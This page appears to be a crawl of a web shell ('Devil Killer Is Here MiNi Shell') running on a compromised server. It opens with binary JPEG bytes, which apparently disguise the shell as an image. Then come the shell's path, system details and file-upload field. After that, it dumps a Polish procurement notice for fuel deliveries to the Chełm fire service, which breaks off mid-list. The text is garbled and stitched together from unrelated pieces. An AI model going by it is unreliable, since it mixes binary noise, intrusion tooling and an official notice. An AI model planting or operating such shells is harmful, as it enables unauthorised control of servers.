JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231219/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231219/0056215101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa paliw płynnych i dodatków do paliw dla Komendy Miejskiej PSP <br/>w Chełmie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Chełmie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KM PSP w Chełmie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110200225</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prymasa Stefana Wyszyńskiego 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 565 34 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 565 55 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">km_chelm@straz.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strazchelm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa paliw płynnych i dodatków do paliw dla Komendy Miejskiej PSP <br/>w Chełmie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-932df649-9e71-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00562151</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032740/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 ZAKUP PALIW PŁYNNYCH I DODTAKÓW DO PALIW DO POJAZDÓW KOMENDY MIEJSKIEJ PAŃSTWOWEJ STRAŻY POŻARNEJ w CHEŁMIE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.lubelskie.straz.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.lubelskie.straz.gov.pl/ &gt;JEDNOSTKI,- &gt; KM PSP CHEŁM.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z art. 67 ustawy PZP określa następujące wymagania techniczne <br/> i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej <br/> przy wykorzystaniu Platformy Zamówień Publicznych t.j.:<br/>6.1. stały dostęp do sieci Inernet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>6.2.komputer klasy PC lub MAC o następującej konfiguracji: pamięc min 2 GB Ram procesor<br/> Intel IV 2GHz, jeden z systemów operacyjnych – MS Windows 10, Mac Os x 10,4, Linux<br/> lub ich nowsze wersje;<br/>6.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/> obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>6.4. włączona obsługa JavaScript;<br/>6.5. zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez<br/> wystawcę certyfikatu używanego przez Wykonawcę.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://przetargi.lubelskie.straz.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">godnie z art. 13 ust. 1 i 2, art. 14 ust. 1 i 2 ogólnego Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), informuję, że:<br/><br/>1. Administratorem przetwarzającym Pani/Pana dane osobowe jest: Komendant Miejski<br/>Państwowej Straży Pożarnej w Chełmie (22-100 Chełm, ul. Prymasa Stefana<br/>Wyszyńskiego 2b, tel. 82 5653428, fax. 82 5655550, e-mail: km_chelm@straz.lublin.pl).<br/><br/>2. W Komendzie Miejskiej Państwowej Straży Pożarnej w Chełmie wyznaczony został<br/>Inspektor Ochrony Danych: (20-012 Lublin, ul. Szczerbowskiego 6 C, tel. 81 53 51 237,<br/>e-mail: iod@kwpsp.lublin.pl).<br/><br/>3. Pani/Pana dane osobowe są przetwarzane na podstawie na podstawie art. 6 ust 1 lit c,<br/>d i e RODO –w związku z obsługą zgłoszenia alarmowego o zdarzeniu oraz<br/>prowadzenia działań ratowniczych w celu ochrony życia, zdrowia, mienia lub<br/>środowiska przed pożarem, klęską żywiołową lub innym miejscowym zagrożeniem.<br/><br/>4. Administrator przetwarza dane osobowe osoby zgłaszającej, osób poszkodowanych,<br/>właścicieli lub zarządców obiektów, wobec których prowadzone są działania jednostek<br/>ochrony przeciwpożarowej.<br/><br/>5. Odbiorcami danych są jednostki organizacyjne PSP oraz inne organy na mocy<br/>przepisów odrębnych ustaw.<br/><br/>6. Dane osobowe podlegają przeglądowi, nie rzadziej niż co 5 lat od dnia ich uzyskania,<br/>a także są przechowywane wyłącznie przez okres niezbędny do realizacji zadań<br/>wynikających z ustawy.<br/><br/>7. Przysługuje Pani/Panu prawo do:<br/>1) żądania od administratora dostępu do treści swoich danych, ich sprostowania,<br/>usunięcia po upływie okresu przechowywania zgodnym z właściwymi przepisami<br/>archiwalnymi lub ograniczenia przetwarzania, wniesienia sprzeciwu wobec<br/>przetwarzania;<br/>2) wniesienia skargi do organu nadzorczego, którym jest Urząd Ochrony Danych<br/>Osobowych (00-193 Warszawa, ul. Stawki 2, tel. 22 531 03 00, fax. 22 531 03 01,<br/>e-mail: kancelaria@giodo.gov.pl) jeżeli uzna Pani/Pan, że przetwarzanie narusza<br/>przepisy RODO.<br/><br/>8. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/><br/>9. Podanie danych osobowych jest wymogiem ustawowym i jest obowiązkowe.<br/>Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa<br/>w art. 22 ust. 1 i 4 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">godnie z art. 13 ust. 1 i 2, art. 14 ust. 1 i 2 ogólnego Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO), informuję, że:<br/><br/>1. Administratorem przetwarzającym Pani/Pana dane osobowe jest: Komendant Miejski<br/>Państwowej Straży Pożarnej w Chełmie (22-100 Chełm, ul. Prymasa Stefana<br/>Wyszyńskiego 2b, tel. 82 5653428, fax. 82 5655550, e-mail: km_chelm@straz.lublin.pl).<br/><br/>2. W Komendzie Miejskiej Państwowej Straży Pożarnej w Chełmie wyznaczony został<br/>Inspektor Ochrony Danych: (20-012 Lublin, ul. Szczerbowskiego 6 C, tel. 81 53 51 237,<br/>e-mail: iod@kwpsp.lublin.pl).<br/><br/>3. Pani/Pana dane osobowe są przetwarzane na podstawie na podstawie art. 6 ust 1 lit c,<br/>d i e RODO –w związku z obsługą zgłoszenia alarmowego o zdarzeniu oraz<br/>prowadzenia działań ratowniczych w celu ochrony życia, zdrowia, mienia lub<br/>środowiska przed pożarem, klęską żywiołową lub innym miejscowym zagrożeniem.<br/><br/>4. Administrator przetwarza dane osobowe osoby zgłaszającej, osób poszkodowanych,<br/>właścicieli lub zarządców obiektów, wobec których prowadzone są działania jednostek<br/>ochrony przeciwpożarowej.<br/><br/>5. Odbiorcami danych są jednostki organizacyjne PSP oraz inne organy na mocy<br/>przepisów odrębnych ustaw.<br/><br/>6. Dane osobowe podlegają przeglądowi, nie rzadziej niż co 5 lat od dnia ich uzyskania,<br/>a także są przechowywane wyłącznie przez okres niezbędny do realizacji zadań<br/>wynikających z ustawy.<br/><br/>7. Przysługuje Pani/Panu prawo do:<br/>1) żądania od administratora dostępu do treści swoich danych, ich sprostowania,<br/>usunięcia po upływie okresu przechowywania zgodnym z właściwymi przepisami<br/>archiwalnymi lub ograniczenia przetwarzania, wniesienia sprzeciwu wobec<br/>przetwarzania;<br/>2) wniesienia skargi do organu nadzorczego, którym jest Urząd Ochrony Danych<br/>Osobowych (00-193 Warszawa, ul. Stawki 2, tel. 22 531 03 00, fax. 22 531 03 01,<br/>e-mail: kancelaria@giodo.gov.pl) jeżeli uzna Pani/Pan, że przetwarzanie narusza<br/>przepisy RODO.<br/><br/>8. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/><br/>9. Podanie danych osobowych jest wymogiem ustawowym i jest obowiązkowe.<br/>Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa<br/>w art. 22 ust. 1 i 4 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ML.2370.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są sukcesywne dostawy paliw i dodatku do paliw dla pojazdów Komendy Miejskiej Państwowej Straży Pożarnej w Chełmie poprzez sprzedaż w publicznych stacjach paliwowych zlokalizowanych na terenie miasta Chełm. Sukcesywne dostawy paliw <br/>i dodatków do paliw będą realizowane na zasadzie tankowań pojazdów wyszczególnionych w wykazie dołączonym do umowy do zbiorników oraz do kanistrów i beczek w wybranej (najkorzystniejszej) lokalizacji stacji paliwowej Wykonawcy, który złożył najkorzystniejszą ofertę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">24957000-7 - Dodatki chemiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty, Zamawiający będzie kierował się następującymi<br/> kryteriami i odpowiadającymi im wagami oraz w następujący sposób będzie oceniał<br/> spełnienie kryteriów oceny ofert<br/><br/><br/>Nazwa kryterium	Waga<br/>Cena całkowita brutto	50 %<br/>Wysokość opustu na ON	44 %<br/>Wysokość opustu na PB 95	5 %<br/>Wysokość opustu na Ad Blue	1%<br/>Zastosowane wzory oraz skala do obliczeń punktowych.<br/><br/>Punkty za kryterium ceny całkowitej brutto (CCB)<br/><br/> najniższa cena całkowita brutto<br/>CCB = ------------------------------------------------------ x 50% x 100<br/> cena całkowita brutto badanej oferty<br/><br/><br/>Punkty za kryterium opust na ON<br/><br/> opust z badanej oferty<br/>OON = -------------------------------------------------- x 44% x 100 <br/> najwyższy zaoferowany opust<br/><br/><br/>Punkty za kryterium opust na Pb95<br/><br/> opust z badanej oferty<br/>OPb95 = -------------------------------------------------- x 5% x 100 <br/> najwyższy zaoferowany opust<br/><br/><br/>Punkty za kryterium opust na AdBlue<br/><br/> opust z badanej oferty<br/>OAdBlue = -------------------------------------------------- x 1% x 100 <br/> najwyższy zaoferowany opust<br/><br/>Łączna liczba punktów (P)<br/><br/>P=CCB+OON+OPb95+OAdBlue<br/><br/><br/>Wynik punktowy oferty (WPO)<br/><br/>2. Oferty będą oceniane metodą punktową w skali 100 punktowej, przyjmując że 1% = 1 pkt;<br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę<br/> punktów;<br/>4. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku;<br/>5. Podstawą badania ofert z punktu widzenia przewidzianych kryteriów oceny ofert <br/> są wartości podane w formularzu ofertowym Wykonawcy;<br/>6. Oferta, która uzyska najkorzystniejszy wynik punktowy zostanie uznana <br/> za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością<br/> uzyskanych punktów;<br/>7. Realizacja zamówienia w zakresie danej części zamówienia zostanie powierzona<br/> Wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania oraz spełniają<br/> warunki udziału w postępowaniu dotyczące:<br/>1.2. zdolności do występowania w obrocie gospodarczym;<br/>1.3. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów;<br/>1.4. sytuacji ekonomicznej i finansowej;<br/>1.5. zdolności technicznej i zawodowej.<br/>2. W niniejszym postępowaniu, Zamawiający określa następujące warunki udziału <br/> w postępowaniu. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy,<br/> którzy:<br/>2.1. posiadają uprawnienia do prowadzenia określonej działalności zawodowej, tj.: posiadają<br/> ważną i ostateczną (prawomocną) koncesję na obrót paliwami ciekłymi zgodnie <br/> z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz. U z 2022 r.<br/> poz. 1385 ze zm.)<br/>2.2. znajdują się w odpowiedniej sytuacji ekonomicznej i finansowej tj.:<br/>2.2.1. posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej<br/> działalności związanej z przedmiotem zamówienia na następującą minimalna sumę<br/> gwarancyjną tj.: 150 000 zł lub<br/>2.2.2. posiadają środki finansowe lub zdolność kredytowa na kwotę co najmniej 150 000 zł.<br/> W przypadku wyrażenia kwot wymienionych w tiret 1 i 2 w innej walucie niż polski<br/> złoty, kwoty te należy przeliczyć wg. średniego kursu złotego NBP (tabela A) z dnia<br/> publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/><br/>Zamawiający dopuszcza możliwość sumowania sumy gwarancyjnej ubezpieczenia, posiadanych środków finansowych oraz zdolności kredytowej w celu uzyskania wymaganego minimum w zakresie sytuacji ekonomicznej i finansowej. W przypadku wyrażenia kwoty w innej walucie niż polski złoty, kwotę tę należy przeliczyć wg średniego kursu złotego NBP (Tabela A) z dnia publikacji ogłoszenia w Biuletynie Zamówień Publicznych.<br/><br/><br/>2.3. posiadają odpowiednią zdolność techniczna lub zawodową polegająca na:<br/>2.3.1. wykonaniu, a przypadku świadczeń okresowych lub ciągłych również wykonywaniu <br/> okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/> prowadzenia działalności jest krótszy – w tym okresie sukcesywnych dostaw paliw<br/> ciekłych o wartości co najmniej 150 000 zł brutto albo równowartości tej kwoty<br/> wyrażonej w innej walucie eg średniego kursu złotego NBP (tabela A) z dnia publikacji<br/> ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych;<br/>2.3.2. dysponowaniu systemem kart flotowych bezgotówkowego rozliczania tankowań <br/> w ilości minimum 10 kart;<br/>2.3.3. dysponowaniu na terenie miasta Chełm co najmniej jedną całodobową stacją paliw<br/> płynnych z możliwością tankowania tradycyjnego oraz z wykorzystaniem<br/> dedykowanych kart paliwowych samochodów osobowych i ciężarowych o masie ponad<br/> 16 000 kg wyposażoną w dystrybutor dodatku do paliwa AdBlue.<br/><br/>3. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu<br/> polegać na zdolnościach technicznych lub zawodowych albo na sytuacji finansowej <br/> lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/> prawnego łączącego go z nim stosunków prawnych.<br/><br/>4. Wykonawca, który polega na sytuacji podmiotów udostępniających zasoby, składa, wraz <br/> z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/> niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy<br/> środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/> dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust 4, potwierdza,<br/> że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/> rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>5.1. zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>5.2. sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów<br/> podmiotu udostępniającego te zasoby przy wykonaniu zamówienia.<br/><br/>6. Zamawiający oceni, czy zdolności techniczne lub zawodowe albo sytuacja finansowa <br/> lub ekonomiczna przez podmioty udostępniające zasoby, pozwalają na wykazanie przez<br/> Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112<br/> ust. 2 pkt. 3 i 4 ustawy PZP, a także zbada, czy wobec podmiotów tych nie zachodzą<br/> podstawy wykluczenia z postępowania, które zostały przewidziane wobec Wykonawcy.<br/><br/>7. Podmiot , który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie<br/> z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę<br/> poniesioną przez Zamawiającego powstała wskutek nieudostępnienia tych zasobów,<br/> chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. <br/>8. Jeżeli zdolności techniczne lub zawodowe albo sytuacja ekonomiczna lub finansowa<br/> podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę<br/> warunku udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy <br/> do wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez<br/> zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał,<br/> że samodzielnie spełnia warunki udziału w postępowaniu.<br/><br/>9. 